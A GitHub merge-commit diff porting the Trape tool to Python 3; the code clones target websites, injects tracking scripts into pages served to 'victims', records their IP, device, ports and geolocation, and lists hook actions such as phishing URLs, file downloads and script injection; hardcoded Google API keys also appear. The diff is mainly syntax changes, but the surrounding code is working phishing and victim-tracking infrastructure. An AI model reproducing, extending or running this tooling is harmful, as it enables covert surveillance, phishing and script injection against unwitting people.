Merge pull request #306 from Glitchfix/feat/python3-port

feat: port to python 3
jofpin · Apr 28, 2021 · e362980 · e362980
2 parents b2810f7 + 1015788
commit e362980
Show file tree

Hide file tree

Showing 9 changed files with 269 additions and 202 deletions.
diff --git a/core/db.py b/core/db.py
diff --git a/core/dependence/urllib2.py b/core/dependence/urllib2.py
diff --git a/core/ngrok.py b/core/ngrok.py
@@ -23,7 +23,7 @@ def __init__(self, authtoken, port, nT, hash):
 		if authtoken:
 			self.token = authtoken
 		else:
-			print "Can't use Ngrok without a valid token"
+			print("Can't use Ngrok without a valid token")
 		system_type = os.name
 		system_name = platform.system()
 		system_architecture = platform.architecture()[0]
@@ -35,7 +35,7 @@ def __init__(self, authtoken, port, nT, hash):
 		if path.exists(str_ngrok):
 			pass
 		else:
-			import urllib2
+			import urllib.request, urllib.error, urllib.parse
 
 			if "posix" in system_type:
 				if "arwin" in system_name:
@@ -58,8 +58,8 @@ def __init__(self, authtoken, port, nT, hash):
 
 			filename = "ngrok.zip"
 
-			download = urllib2.urlopen(download_link)
-			saved_file=file(filename,"w")
+			download = urllib.request.urlopen(download_link)
+			saved_file=open(filename,"b+w")
 			saved_file.write(download.read())
 			saved_file.close()
 
@@ -79,4 +79,4 @@ def start_ngrok(port, hash, f=0):
 		if "nt" in system_type:
 			str_ngrok = './ngrok.exe'
 		result = subprocess.check_output([str_ngrok, "http", port])
-		print result
+		print(result)
diff --git a/core/stats.py b/core/stats.py
@@ -17,6 +17,7 @@
 from flask import Flask, render_template, session, request, json, redirect, url_for, send_from_directory
 from flask_cors import CORS
 from trape import Trape
+import urllib
 from core.db import Database
 
 # Main parts, to generate relationships among others
@@ -90,9 +91,9 @@ def home_get_preview():
 
 @app.route("/get_title", methods=["POST"])
 def home_get_title():
-    opener = urllib2.build_opener()
+    opener = urllib.request.build_opener()
     html = opener.open(trape.url_to_clone).read()
-    html = html[html.find('<title>') + 7 : html.find('</title>')]
+    html = html[html.find(b'<title>') + 7 : html.find(b'</title>')]
     return json.dumps({'status' : 'OK', 'title' : html})
 
 @app.route("/get_requests", methods=["POST"])

diff --git a/core/trape.py b/core/trape.py
@@ -13,8 +13,9 @@
 #**
 import time
 import json
+import urllib
 from core.dependence import urllib2
-import httplib 
+import http.client 
 import argparse
 import socket
 import sys
@@ -30,7 +31,7 @@
 class Trape(object):
 	def __init__(self, stat = 0):
 		self.name_trape = "Trape"
-		self.version = "2.0"
+		self.version = "2.1"
 		self.stats_path = "ngrok"
 		self.home_path = utils.generateToken(18)
 		self.logout_path = utils.generateToken(6)
@@ -46,7 +47,7 @@ def __init__(self, stat = 0):
 		self.CSSFiles = ({"path" : "/static/img/favicon.ico", "src" : utils.generateToken(12)},{"path" : "/static/img/favicon.png", "src" : utils.generateToken(12)},{"path" : "/static/css/base-icons.css", "src" : utils.generateToken(12)},{"path" : "/static/css/styles.css", "src" : utils.generateToken(12)},{"path" : "/static/css/normalize.min.css", "src" : utils.generateToken(12)},{"path": "/static/css/services-icons.css", "src" : utils.generateToken(12)},)
 
 		if self.stat == 1:
-			c = httplib.HTTPConnection('www.google.com', timeout=5)
+			c = http.client.HTTPConnection('www.google.com', timeout=5)
 			try:
 				c.request("HEAD", "/")
 				c.close()
@@ -101,15 +102,15 @@ def __init__(self, stat = 0):
 				utils.Go("----------------------------------------------")
 				utils.Go("" + " " + utils.Color['redBold'] + "TRAPE" + utils.Color['white'] +" {" + utils.Color['yellowBold'] + "stable" + utils.Color['white'] + "}" + utils.Color['white'] + " - " + "Osint and analytics tool" + " " + "<" +utils.Color['white'])
 				utils.Go("----------------------------------------------")
-				utils.Go("| v" + utils.Color['redBold'] + "2.0" + utils.Color['white'] + " |")    
+				utils.Go("| v" + utils.Color['redBold'] + self.version + utils.Color['white'] + " |")    
 				utils.Go("--------" + "\n")
 				utils.Go(utils.Color['whiteBold'] + "[" + utils.Color['greenBold'] + "!" + utils.Color['whiteBold'] + "]" + " " + utils.Color['white'] + "Enter the information requested below to complete the execution" + utils.Color['white'])
 				utils.Go("")
 
-				options.url = raw_input(utils.Color['blueBold'] + "-" + utils.Color['white'] + " Enter a URL to generate the lure" + " " + utils.Color['yellow'] + ":~> " + utils.Color['white'])
+				options.url = input(utils.Color['blueBold'] + "-" + utils.Color['white'] + " Enter a URL to generate the lure" + " " + utils.Color['yellow'] + ":~> " + utils.Color['white'])
 
 			if options.port is None:
-				options.port = raw_input(utils.Color['blueBold'] + "-" + utils.Color['white'] + " What is your port to generate the server?" + " " + utils.Color['yellow'] + ":~> " + utils.Color['white'])
+				options.port = input(utils.Color['blueBold'] + "-" + utils.Color['white'] + " What is your port to generate the server?" + " " + utils.Color['yellow'] + ":~> " + utils.Color['white'])
 
 			while utils.checkPort(int(options.port)) == False:
 				utils.Go("\033[H\033[J")
@@ -118,10 +119,10 @@ def __init__(self, stat = 0):
 				utils.Go("----------------------------------------------")
 				utils.Go("\n")
 				utils.Go(utils.Color['whiteBold'] + "[" + utils.Color['redBold'] + "x" + utils.Color['whiteBold'] + "]" + utils.Color['redBold'] + " " + "ERROR:" + " " + utils.Color['whiteBold'] + "The port: " + options.port + utils.Color['white'] + " " + "is not available, It was previously used (" + utils.Color['yellow'] + "Use another port" + utils.Text['end'] + ")" + "\n\n")
-				options.port = raw_input(utils.Color['blueBold'] + "-" + utils.Color['white'] + " What is your port to generate the server?" + " " + utils.Color['yellow'] + ":~> " + utils.Color['white'])
+				options.port = input(utils.Color['blueBold'] + "-" + utils.Color['white'] + " What is your port to generate the server?" + " " + utils.Color['yellow'] + ":~> " + utils.Color['white'])
 
 			#while utils.checkUrl(str(options.url)) == False:
-				options.url = raw_input(utils.Color['blueBold'] + "-" + utils.Color['white'] + " Enter a URL to generate the lure" + " " + utils.Color['yellow'] + ":~> " + utils.Color['white'])
+				options.url = input(utils.Color['blueBold'] + "-" + utils.Color['white'] + " Enter a URL to generate the lure" + " " + utils.Color['yellow'] + ":~> " + utils.Color['white'])
 
 
 			utils.Go("")
@@ -143,7 +144,7 @@ def __init__(self, stat = 0):
 			if (options.ngrok or (self.ngrok != "")):
 				if self.ngrok == '':
 					utils.Go("\033[H\033[J")
-					self.ngrok = raw_input("What is your nGrok token?" + " " + utils.Color['yellow'] + ":~> " + utils.Color['white'])
+					self.ngrok = input("What is your nGrok token?" + " " + utils.Color['yellow'] + ":~> " + utils.Color['white'])
 				if (self.ngrok != ''):
 					from core.ngrok import ngrok
 					import os.path as path
@@ -190,7 +191,7 @@ def header(self):
 				if self.googl == '':
 					self.googl = 'AIzaSyCPzcppCT27KTHnxAIQvYhtvB_l8sKGYBs'
 				try:
-					opener = urllib2.build_opener()
+					opener = urllib.request.build_opener()
 					pLog = 4040
 					ngrokStatus = str(opener.open('http://127.0.0.1:' + str(pLog) + '/api/tunnels').read()).replace('\n', '').replace(' ', '')
 					time.sleep(0.5)
@@ -238,7 +239,7 @@ def trape_config(self):
 		utils.Go("----------------------------------------------------------")
 		utils.Go("" + " " + utils.Color['redBold'] + "TRAPE" + utils.Color['white'] +" {" + utils.Color['yellowBold'] + "stable" + utils.Color['white'] + "}" + utils.Color['white'] + " - " + "Configuration zone to use the software" + " " + "<" + utils.Color['white'])
 		utils.Go("----------------------------------------------------------")
-		utils.Go("| v" + utils.Color['redBold'] + "2.0" + utils.Color['white'] + " |")    
+		utils.Go("| v" + utils.Color['redBold'] + self.version + utils.Color['white'] + " |")    
 		utils.Go("--------" + "\n")
 		utils.Go(utils.Color['whiteBold'] + "GENERAL CONFIG" + utils.Color['white'])
 		utils.Go("------")
@@ -248,20 +249,20 @@ def trape_config(self):
 		utils.Go("------")
 		utils.Go("In the next section you must enter your Ngrok token, if you do not have \none register at (" + utils.Color['blueBold'] + "https://ngrok.com" + utils.Color['white'] + "), this data is necessary for the generation of public network tunnels.")
 		utils.Go("")
-		c_nGrokToken = raw_input(utils.Color['blueBold'] + "-" + utils.Color['white'] + " Enter your ngrok token" + " " + utils.Color['yellow'] + ":~> " + utils.Color['white'])
+		c_nGrokToken = input(utils.Color['blueBold'] + "-" + utils.Color['white'] + " Enter your ngrok token" + " " + utils.Color['yellow'] + ":~> " + utils.Color['white'])
 		utils.Go("")
 		utils.Go(utils.Color['whiteBold'] + "GOOGLE API" + utils.Color['white'])
 		utils.Go("------")
 		utils.Go("You must register with the " + utils.Color['blueBold'] + "Google Console" + utils.Color['white'] + ", and get an API for maps and another for shortening. \nBy having these data you complete the settings")
 		utils.Go("")
-		c_gMapsToken = raw_input(utils.Color['blueBold'] + "-" + utils.Color['white'] + " What is your Google Maps Api Key?" + " " + utils.Color['yellow'] + ":~> " + utils.Color['white'])
-		c_gOoglToken = raw_input(utils.Color['blueBold'] + "-" + utils.Color['white'] + " Enter your Goo.gl (shortener) Api Key (leave it empty if you don't have)" + " " + utils.Color['yellow'] + ":~> " + utils.Color['white'])
+		c_gMapsToken = input(utils.Color['blueBold'] + "-" + utils.Color['white'] + " What is your Google Maps Api Key?" + " " + utils.Color['yellow'] + ":~> " + utils.Color['white'])
+		c_gOoglToken = input(utils.Color['blueBold'] + "-" + utils.Color['white'] + " Enter your Goo.gl (shortener) Api Key (leave it empty if you don't have)" + " " + utils.Color['yellow'] + ":~> " + utils.Color['white'])
 		utils.Go("")
 		utils.Go(utils.Color['whiteBold'] + "IP INFO API" + utils.Color['white'])
 		utils.Go("------")
 		utils.Go("You must register with the " + utils.Color['blueBold'] + "https://ipgeolocation.io" + utils.Color['white'] + ", and get an API for geolocation. \nBy having these data you complete the settings")
 		utils.Go("")
-		c_ipinfo = raw_input(utils.Color['blueBold'] + "-" + utils.Color['white'] + " What is your IP Info Api Key?" + " " + utils.Color['yellow'] + ":~> " + utils.Color['white'])
+		c_ipinfo = input(utils.Color['blueBold'] + "-" + utils.Color['white'] + " What is your IP Info Api Key?" + " " + utils.Color['yellow'] + ":~> " + utils.Color['white'])
 		utils.Go("")
 		utils.Go(utils.Color['greenBold'] + "-" + utils.Color['white'] + " Congratulations! " + utils.Color['greenBold'] + "Successful configuration" + utils.Color['white'] + ", now enjoy Trape!" + utils.Color['white'])
 		utils.Go("")

diff --git a/core/user.py b/core/user.py
@@ -21,6 +21,8 @@
 import os
 import sys
 import platform
+import urllib
+import requests
 from multiprocessing import Process
 """
 from bs4 import BeautifulSoup
@@ -38,9 +40,6 @@
 class victim_server(object):
     @app.route("/" + trape.victim_path)
     def homeVictim():
-        opener = urllib2.build_opener()
-        headers = victim_headers(request.user_agent)
-        opener.addheaders = headers
         """
         clone_html  = opener.open(trape.url_to_clone).read()
         soup = BeautifulSoup(clone_html, 'lxml')
@@ -63,10 +62,11 @@ def homeVictim():
                 if url.startswith('/'):
                     clone_html = clone_html.replace(url, domain + url)
         """
+        r = requests.get(trape.url_to_clone, headers=victim_headers2(request.user_agent))
         if (trape.type_lure == 'local'):
             html = assignScripts(victim_inject_code(render_template("/" + trape.url_to_clone), 'payload', '/', trape.gmaps, trape.ipinfo))
         else:
-            html = assignScripts(victim_inject_code(opener.open(trape.url_to_clone).read(), 'payload', trape.url_to_clone, trape.gmaps, trape.ipinfo))
+            html = assignScripts(victim_inject_code(r.content, 'payload', trape.url_to_clone, trape.gmaps, trape.ipinfo))
         return html
 
     @app.route("/register", methods=["POST"])
@@ -159,7 +159,7 @@ def redirectVictim():
         url = request.args.get('url')
         if url[0:4] != 'http':
             url = 'http://' + url
-        opener = urllib2.build_opener()
+        opener = urllib.request.build_opener()
         headers = victim_headers(request.user_agent)
         opener.addheaders = headers
         html = assignScripts(victim_inject_code(opener.open(url).read(), 'vscript', url, trape.gmaps, trape.ipinfo))
@@ -223,11 +223,11 @@ def getHostsAlive(ip, vId):
         pass
 
 def assignScripts(code):
-    code = code.replace("base.js", trape.JSFiles[0]['src'])
-    code = code.replace("libs.min.js",trape.JSFiles[1]['src'])
-    code = code.replace("login.js", trape.JSFiles[2]['src'])
-    code = code.replace("payload.js", trape.JSFiles[3]['src'])
-    code = code.replace("trape.js", trape.JSFiles[4]['src'])
-    code = code.replace("vscript.js", trape.JSFiles[5]['src'])
-    code = code.replace("custom.js", trape.JSFiles[6]['src'])
+    code = code.replace("base.js".encode(), trape.JSFiles[0]['src'].encode())
+    code = code.replace("libs.min.js".encode(),trape.JSFiles[1]['src'].encode())
+    code = code.replace("login.js".encode(), trape.JSFiles[2]['src'].encode())
+    code = code.replace("payload.js".encode(), trape.JSFiles[3]['src'].encode())
+    code = code.replace("trape.js".encode(), trape.JSFiles[4]['src'].encode())
+    code = code.replace("vscript.js".encode(), trape.JSFiles[5]['src'].encode())
+    code = code.replace("custom.js".encode(), trape.JSFiles[6]['src'].encode())
     return code
diff --git a/core/user_objects.py b/core/user_objects.py
@@ -1,6 +1,6 @@
 #!/usr/bin/env python
 # -*- coding: utf-8 -*-
-#**
+# **
 #
 #########
 # trape #
@@ -10,7 +10,7 @@
 # For full copyright information this visit: https://github.com/jofpin/trape
 #
 # Copyright 2018 by Jose Pino (@jofpin) / <[email protected]>
-#**
+# **
 class victim(object):
     def __init__(self, vId, ip, device, browser, version, ports, cpu, date):
         self.vId = vId
@@ -22,6 +22,7 @@ def __init__(self, vId, ip, device, browser, version, ports, cpu, date):
         self.cpu = cpu
         self.date = date
 
+
 class victim_geo(object):
     def __init__(self, id, city, country_code, country_name, ip, latitude, longitude, metro_code, region_code, region_name, time_zone, zip_code, isp, ua, refer):
         self.id = id
@@ -40,6 +41,7 @@ def __init__(self, id, city, country_code, country_name, ip, latitude, longitude
         self.ua = ua
         self.refer = refer
 
+
 class victim_request(object):
     def __init__(self, id, site, fid, name, value, sId):
         self.id = id
@@ -49,40 +51,61 @@ def __init__(self, id, site, fid, name, value, sId):
         self.value = value
         self.sId = sId
 
+
+def victim_headers2(ua):
+    return {
+        "User-Agent": str(ua),
+        "Content-Type": "text/html; charset=utf-8",
+        "Accept": "text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.8",
+        "Connection": "keep-alive",
+        # Do Not Track (info here: https://www.w3.org/TR/tracking-dnt/)
+        "DNT": "1",
+        "Keep-Alive": "115",
+    }
+
+
 def victim_headers(ua):
-    return [  ("User-Agent", ua),
-              ("Content-Type", "text/html; charset=utf-8"),
-              ("Accept", "text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.8"),
-              ("Connection", "keep-alive"),
-              ("DNT", "1"), # Do Not Track (info here: https://www.w3.org/TR/tracking-dnt/)
-              ("Keep-Alive", "115")
+    return [("User-Agent", ua),
+            ("Content-Type", "text/html; charset=utf-8"),
+            ("Accept", "text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.8"),
+            ("Connection", "keep-alive"),
+            # Do Not Track (info here: https://www.w3.org/TR/tracking-dnt/)
+            ("DNT", "1"),
+            ("Keep-Alive", "115")
             ]
 
-def victim_inject_code(html, script = 'a', url_to_clone = '', gMapsApiKey = 'AIzaSyBUPHAjZl3n8Eza66ka6B78iVyPteC5MgM', IpInfoApiKey = ''):
+
+def victim_inject_code(html, script='a', url_to_clone='', gMapsApiKey='AIzaSyBUPHAjZl3n8Eza66ka6B78iVyPteC5MgM', IpInfoApiKey=''):
     url_to_clone = str(url_to_clone)
-    html = html.replace('src="', 'src="' + url_to_clone + '/')
-    html = html.replace("src='", "src='" + url_to_clone + '/')
-    html = html.replace('src="' + url_to_clone + '/' + 'http', 'src="http')
-    html = html.replace("src='" + url_to_clone + '/' + 'http', "src='http")
-    html = html.replace("href='", "href='" + url_to_clone + '/')
-    html = html.replace('href="', 'href="' + url_to_clone + '/')
-    html = html.replace('href="' + url_to_clone + '/' + 'http', 'href="http')
-    html = html.replace("href='" + url_to_clone + '/' + 'http', "href='http")
-    html = html.replace('</head>', '<script type="text/javascript" src="/static/js/libs.min.js"></script></head>')
-    html = html.replace('</head>', '<script type="text/javascript">window.gMapsApiKey="' + str(gMapsApiKey) + '"; window.IpInfoApiKey="' + str(IpInfoApiKey) + '";</script></head>')
-    html = html.replace('</head>', '<script type="text/javascript" src="/static/js/base.js"></script></head>')
-    html = html.replace('</head>', '<script type="text/javascript" src="/static/js/custom.js"></script></head>')
-    html = html.replace('</head>', '<script type="text/javascript" src="/static/js/' + script + '.js"></script></head>')
+    html = html.replace('src="'.encode(), str('src="' + url_to_clone + '/').encode())
+    html = html.replace("src='".encode(), str("src='" + url_to_clone + '/').encode())
+    html = html.replace(str('src="' + url_to_clone + '/' + 'http').encode(), 'src="http'.encode())
+    html = html.replace(str("src='" + url_to_clone + '/' + 'http').encode(), "src='http".encode())
+    html = html.replace("href='".encode(), str("href='" + url_to_clone + '/').encode())
+    html = html.replace('href="'.encode(), str('href="' + url_to_clone + '/').encode())
+    html = html.replace(str('href="' + url_to_clone + '/' + 'http').encode(), 'href="http'.encode())
+    html = html.replace(str("href='" + url_to_clone + '/' + 'http').encode(), "href='http".encode())
+    html = html.replace(
+        '</head>'.encode(), '<script type="text/javascript" src="/static/js/libs.min.js"></script></head>'.encode())
+    html = html.replace('</head>'.encode(), str('<script type="text/javascript">window.gMapsApiKey="' + str(
+        gMapsApiKey) + '"; window.IpInfoApiKey="' + str(IpInfoApiKey) + '";</script></head>').encode())
+    html = html.replace(
+        '</head>'.encode(), '<script type="text/javascript" src="/static/js/base.js"></script></head>'.encode())
+    html = html.replace(
+        '</head>'.encode(), '<script type="text/javascript" src="/static/js/custom.js"></script></head>'.encode())
+    html = html.replace(
+        '</head>'.encode(), str('<script type="text/javascript" src="/static/js/' + script + '.js"></script></head>').encode())
     return html
 
+
 def attacks_hook_message(data):
     return {
-        'network' : 'Detected network ',
-        'url' : "Open url phishing ",
-        'redirect' : "Redirecting to ",
-        'alert' : "Sending alert ",
-        'execute' : "Downloading file ",
-        'talk' : "Sending voice message ",
-        'jscode' : "Sending Script ",
-        'jsscript' : "Injecting Script "
-    }.get(data, False)
+        'network': 'Detected network ',
+        'url': "Open url phishing ",
+        'redirect': "Redirecting to ",
+        'alert': "Sending alert ",
+        'execute': "Downloading file ",
+        'talk': "Sending voice message ",
+        'jscode': "Sending Script ",
+        'jsscript': "Injecting Script "
+    }.get(data, False)